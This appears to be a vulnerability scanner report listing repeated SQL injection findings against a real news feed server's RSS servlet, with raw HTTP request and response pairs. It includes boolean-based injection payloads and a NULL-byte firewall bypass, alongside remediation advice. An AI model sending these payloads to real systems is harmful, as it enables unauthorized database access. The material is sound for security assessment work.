The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 13847561'%20or%201%3d1--%20 and 13847561'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /mngi/rss/CustomRssServlet13847561'%20or%201%3d1--%20/568/200789.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:20:46 GMT
Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <HTML><HEAD><TITLE>The page cannot be found</TITLE> <META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252"> <STYLE type="text/css"> BODY { font: 8pt/12pt verdana } H1 { font: 13pt/15pt verdana } H2 { font: 8pt/12pt verdana } A:link { color: red } A:visited { color: maroon } </STYLE> </HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>
<h1>The page cannot be found</h1> The page you are looking for might have been removed, had its name changed, or is temporarily unavailable. <hr> <p>Please try the following:</p> <ul> <li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li> <li>If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted. </li> <li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li> </ul> <h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2> <hr> <p>Technical Information (for support personnel)</p> <ul> <li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li> <li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr), and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li> </ul>
</TD></TR></TABLE></BODY></HTML>
Request 2
GET /mngi/rss/CustomRssServlet13847561'%20or%201%3d2--%20/568/200789.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 2
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:20:46 GMT
Content-Length: 0
Connection: close
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /mngi/rss/CustomRssServlet'%20and%201%3d1--%20/568/200792.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:21:03 GMT
Content-Length: 0
Connection: close
Request 2
GET /mngi/rss/CustomRssServlet'%20and%201%3d2--%20/568/200792.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 2
HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:21:03 GMT
Connection: close
The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /mngi/rss/CustomRssServlet/568'%20and%201%3d1--%20/200792.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:21:10 GMT
Connection: close
Request 2
GET /mngi/rss/CustomRssServlet/568'%20and%201%3d2--%20/200792.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 2
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:21:10 GMT
Content-Length: 0
Connection: close
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks, but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code and, if appropriate, ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /mngi/rss/CustomRssServlet%00'/568/200795.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 400 Bad Request
Content-Type: text/html
Content-Length: 34
Date: Tue, 07 Dec 2010 23:21:23 GMT
Connection: close
<h1>Bad Request (Invalid URL)</h1>
Request 2
GET /mngi/rss/CustomRssServlet%00''/568/200795.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 2
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:21:23 GMT
Content-Length: 0
Connection: close
The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads 11124167%20or%201%3d1--%20 and 11124167%20or%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /mngi/rss/CustomRssServlet/56811124167%20or%201%3d1--%20/200795.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:21:27 GMT
Connection: close
Request 2
GET /mngi/rss/CustomRssServlet/56811124167%20or%201%3d2--%20/200795.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 2
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:21:27 GMT
Content-Length: 0
Connection: close
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 11517556'%20or%201%3d1--%20 and 11517556'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /mngi/rss/CustomRssServlet11517556'%20or%201%3d1--%20/568/200902.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:21:44 GMT
Content-Length: 0
Connection: close
Request 2
GET /mngi/rss/CustomRssServlet11517556'%20or%201%3d2--%20/568/200902.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 2
HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:21:44 GMT
Connection: close
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /mngi/rss/CustomRssServlet'%20and%201%3d1--%20/568/200906.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:21:41 GMT
Connection: close
Request 2
GET /mngi/rss/CustomRssServlet'%20and%201%3d2--%20/568/200906.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 2
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:21:41 GMT
Content-Length: 0
Connection: close
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 31633381'%20or%201%3d1--%20 and 31633381'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /mngi31633381'%20or%201%3d1--%20/rss/CustomRssServlet/568/200907.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Pragma: no-cache
Content-Type: text/html
Cache-Control: no-cache
Expires: Tue, 07 Dec 2010 23:21:10 GMT
Date: Tue, 07 Dec 2010 23:21:10 GMT
Content-Length: 424
Connection: close
<HTML> <!-- This file is for Error code #404 - Not Found --> <HEAD> <TITLE>Not Found (404)</TITLE> </HEAD>
<BODY BGCOLOR="#eeeeff"> <H1>Not Found (404)</H1>
The file that you requested could not be found on this server. If you provided the URL, please check to ensure that it is correct. If you followed a hypermedia link, please notify the administrator of that server of this error. </BODY></HTML>
Request 2
GET /mngi31633381'%20or%201%3d2--%20/rss/CustomRssServlet/568/200907.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 2
HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:21:11 GMT
Connection: close
The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /mngi/rss/CustomRssServlet/568'%20and%201%3d1--%20/200907.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:21:20 GMT
Connection: close
Request 2
GET /mngi/rss/CustomRssServlet/568'%20and%201%3d2--%20/200907.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 2
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:21:20 GMT
Content-Length: 0
Connection: close
The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks, but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code and, if appropriate, ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /mngi/rss/CustomRssServlet/568%00'/200908.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 400 Bad Request
Content-Type: text/html
Content-Length: 34
Date: Tue, 07 Dec 2010 23:21:39 GMT
Connection: close
<h1>Bad Request (Invalid URL)</h1>
Request 2
GET /mngi/rss/CustomRssServlet/568%00''/200908.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 2
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:21:39 GMT
Content-Length: 0
Connection: close
The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks, but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code and, if appropriate, ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /mngi/rss/CustomRssServlet/568%00'/200909.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 400 Bad Request
Content-Type: text/html
Content-Length: 34
Date: Tue, 07 Dec 2010 23:22:07 GMT
Connection: close
<h1>Bad Request (Invalid URL)</h1>
Request 2
GET /mngi/rss/CustomRssServlet/568%00''/200909.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 2
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:22:07 GMT
Content-Length: 0
Connection: close
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /mngi'%20and%201%3d1--%20/rss/CustomRssServlet/568/200910.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:21:06 GMT
Connection: close
Request 2
GET /mngi'%20and%201%3d2--%20/rss/CustomRssServlet/568/200910.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 2
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Pragma: no-cache
Content-Type: text/html
Cache-Control: no-cache
Expires: Tue, 07 Dec 2010 23:21:06 GMT
Date: Tue, 07 Dec 2010 23:21:06 GMT
Content-Length: 424
Connection: close
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 16915327'%20or%201%3d1--%20 and 16915327'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /mngi16915327'%20or%201%3d1--%20/rss/CustomRssServlet/568/200911.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:22:06 GMT
Connection: close
Request 2
GET /mngi16915327'%20or%201%3d2--%20/rss/CustomRssServlet/568/200911.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 404 Not Found Server: Microsoft-IIS/5.0 X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ] Pragma: no-cache Content-Type: text/html Cache-Control: no-cache Expires: Tue, 07 Dec 2010 23:22:06 GMT Date: Tue, 07 Dec 2010 23:22:06 GMT Content-Length: 424 Connection: close
<HTML> <!-- This file is for Error code #404 - Not Found --> <HEAD> <TITLE>Not Found (404)</TITLE> </HEAD>
<BODY BGCOLOR="#eeeeff"> <H1>Not Found (404)</H1>
The file that you requested could not be found on this server. If you provided the URL, please check to ensure that it is correct. If you followed a hypermedia link, please notify the administrator of that server of this error. </BODY></HTML>
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 18682428'%20or%201%3d1--%20 and 18682428'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /mngi/rss/CustomRssServlet18682428'%20or%201%3d1--%20/568/200911.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 404 Not Found Content-Length: 1635 Content-Type: text/html Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Tue, 07 Dec 2010 23:22:13 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <HTML><HEAD><TITLE>The page cannot be found</TITLE> <META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252"> <STYLE type="text/css"> BODY { font: 8pt/12pt verdana } H1 { font: 13pt/15pt verdana } H2 { font: 8pt/12pt verdana } A:link { color: red } A:visited { color: maroon } </STYLE> </HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>
<h1>The page cannot be found</h1> The page you are looking for might have been removed, had its name changed, or is temporarily unavailable. <hr> <p>Please try the following:</p> <ul> <li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li> <li>If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted. </li> <li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li> </ul> <h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2> <hr> <p>Technical Information (for support personnel)</p> <ul> <li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li> <li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr), and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li> </ul>
</TD></TR></TABLE></BODY></HTML>
Request 2
GET /mngi/rss/CustomRssServlet18682428'%20or%201%3d2--%20/568/200911.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ] Content-Type: text/html Date: Tue, 07 Dec 2010 23:22:13 GMT Content-Length: 0 Connection: close
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 11169924'%20or%201%3d1--%20 and 11169924'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /mngi/rss/CustomRssServlet11169924'%20or%201%3d1--%20/568/200912.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 404 Not Found Content-Length: 1635 Content-Type: text/html Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Tue, 07 Dec 2010 23:21:22 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <HTML><HEAD><TITLE>The page cannot be found</TITLE> <META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252"> <STYLE type="text/css"> BODY { font: 8pt/12pt verdana } H1 { font: 13pt/15pt verdana } H2 { font: 8pt/12pt verdana } A:link { color: red } A:visited { color: maroon } </STYLE> </HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>
<h1>The page cannot be found</h1> The page you are looking for might have been removed, had its name changed, or is temporarily unavailable. <hr> <p>Please try the following:</p> <ul> <li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li> <li>If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted. </li> <li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li> </ul> <h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2> <hr> <p>Technical Information (for support personnel)</p> <ul> <li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li> <li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr), and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li> </ul>
</TD></TR></TABLE></BODY></HTML>
Request 2
GET /mngi/rss/CustomRssServlet11169924'%20or%201%3d2--%20/568/200912.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ] Content-Type: text/html Date: Tue, 07 Dec 2010 23:21:22 GMT Content-Length: 0 Connection: close
The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks, but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /mngi/rss/CustomRssServlet/568%00'/200913.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 400 Bad Request Content-Type: text/html Content-Length: 34 Date: Tue, 07 Dec 2010 23:21:53 GMT Connection: close
<h1>Bad Request (Invalid URL)</h1>
Request 2
GET /mngi/rss/CustomRssServlet/568%00''/200913.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ] Content-Type: text/html Date: Tue, 07 Dec 2010 23:21:53 GMT Content-Length: 0 Connection: close
The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads 64439849'%20or%201%3d1--%20 and 64439849'%20or%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /mngi/rss/CustomRssServlet/56864439849'%20or%201%3d1--%20/200914.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 404 Not Found Content-Length: 1635 Content-Type: text/html Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Tue, 07 Dec 2010 23:21:35 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <HTML><HEAD><TITLE>The page cannot be found</TITLE> <META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252"> <STYLE type="text/css"> BODY { font: 8pt/12pt verdana } H1 { font: 13pt/15pt verdana } H2 { font: 8pt/12pt verdana } A:link { color: red } A:visited { color: maroon } </STYLE> </HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>
